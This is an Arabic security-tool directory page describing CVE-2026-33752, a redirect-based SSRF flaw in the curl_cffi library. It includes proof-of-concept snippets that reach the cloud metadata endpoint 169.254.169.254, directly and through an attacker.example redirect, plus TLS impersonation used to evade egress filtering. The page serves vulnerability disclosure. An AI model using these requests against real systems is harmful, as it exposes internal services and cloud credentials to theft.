Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-33752 — يُظهر ثغرة SSRF قائمة على إعادة التوجيه في curl_cffi تتيح الوصول إلى الشبكة الداخلية، مع كود إثبات المفهوم (PoC) وتحليل لتجاوز انتحال TLS. | Kitploit
أدوات/GitHubGitHub/redyank/cve-2026-33752
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراق
GitHubredyank/cve-2026-33752

CVE-2026-33752

يُظهر ثغرة SSRF قائمة على إعادة التوجيه في curl_cffi تتيح الوصول إلى الشبكة الداخلية، مع كود إثبات المفهوم (PoC) وتحليل لتجاوز انتحال TLS.

عرض المستودع
1منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-33752

CVE-2026-33752(إعادة توجيه قائمة على SSRF تؤدي إلى الوصول إلى الشبكة الداخلية في curl_cffi)

ملخص

لا يقيد curl_cffi الطلبات إلى نطاقات IP الداخلية، ويتبع عمليات إعادة التوجيه تلقائيًا عبر libcurl الأساسي.

بسبب هذا، يمكن لعنوان URL يتحكم فيه المهاجم إعادة توجيه الطلبات إلى خدمات داخلية مثل نقاط نهاية بيانات التعريف السحابية. بالإضافة إلى ذلك، يمكن لميزة انتحال بصمة TLS في curl_cffi جعل هذه الطلبات تبدو كحركة مرور متصفح شرعية، مما قد يتجاوز بعض ضوابط الشبكة.

التفاصيل

تأتي المشكلة من كيفية تعامل curl_cffi مع الطلبات الصادرة

  • يتم تمرير عناوين URL المقدمة من المستخدم مباشرة إلى libcurl دون التحقق مما إذا كانت تحل إلى نطاقات IP داخلية (مثل 127.0.0.1، 169.254.0.0/16).
  • يتم اتباع عمليات إعادة التوجيه تلقائيًا (CURLOPT_FOLLOWLOCATION = 1) داخل libcurl.
  • لا يوجد تحقق من وجهات إعادة التوجيه على مستوى Python.

هذا يعني أنه حتى إذا كان التطبيق يسمح فقط بالطلبات إلى عناوين URL خارجية، يمكن للمهاجم

  • توفير عنوان URL يشير إلى خادم يتحكم فيه المهاجم
  • إرجاع استجابة إعادة توجيه تشير إلى خدمة داخلية
  • جعل curl_cffi يتبع إعادة التوجيه تلك تلقائيًا

ونتيجة لذلك، يمكن الوصول إلى نقاط النهاية الداخلية (مثل واجهات برمجة تطبيقات بيانات التعريف لمثيلات السحابة).

بالإضافة إلى ذلك، يدعم curl_cffi انتحال بصمة TLS (مثل impersonate="chrome"). في البيئات التي يتم فيها تصفية الطلبات الصادرة بناءً على بصمة TLS، يمكن أن يجعل هذا هذه الطلبات أكثر صعوبة في الاكتشاف أو الحظر.

هذا السلوك مشابه لقضايا SSRF القائمة على إعادة التوجيه المبلغ عنها سابقًا مثل CVE-2025-68616، حيث سمحت عمليات إعادة التوجيه بالوصول إلى موارد داخلية غير مقصودة.

إثبات المفهوم (PoC)

  • طلب داخلي مباشر
  • root@kitploit:~
    import curl_cffi
    resp = curl_cffi.get("http://169.254.169.254/latest/meta-data/")
    print(resp.text)
    
    1. إعادة توجيه إلى خدمة داخلية خادم المهاجم:
    root@kitploit:~
    GET /test
    → 302 Location: http://169.254.169.254/latest/meta-data/
    

    كود الضحية:

    root@kitploit:~
    import curl_cffi
    resp = curl_cffi.get("https://attacker.example/test")
    print(resp.text)
    

    النتيجة

    • يذهب الطلب الأولي إلى خادم المهاجم
    • يتم إرجاع إعادة التوجيه
    • يتبع libcurl إعادة التوجيه تلقائيًا
    • يتم الوصول إلى نقطة نهاية بيانات التعريف الداخلية
    1. مع انتحال TLS
    root@kitploit:~
    import curl_cffi\
    resp = curl_cffi.get(
        "https://attacker.example/test",
        impersonate="chrome")
    

    في بعض البيئات، قد يساعد هذا الطلب في تجاوز ضوابط التصفية القائمة على TLS.

    التأثير

    قد يتمكن المهاجم الذي يمكنه التحكم في عنوان URL المطلوب من:

    • الوصول إلى خدمات الشبكة الداخلية
    • الوصول إلى نقاط نهاية بيانات التعريف السحابية واسترجاع معلومات حساسة
    • تجاوز بعض آليات التصفية الصادرة (اعتمادًا على البيئة) يتوافق هذا مع CWE-918 تزوير الطلبات من جانب الخادم (Server-Side Request Forgery).
    تنزيل الأداة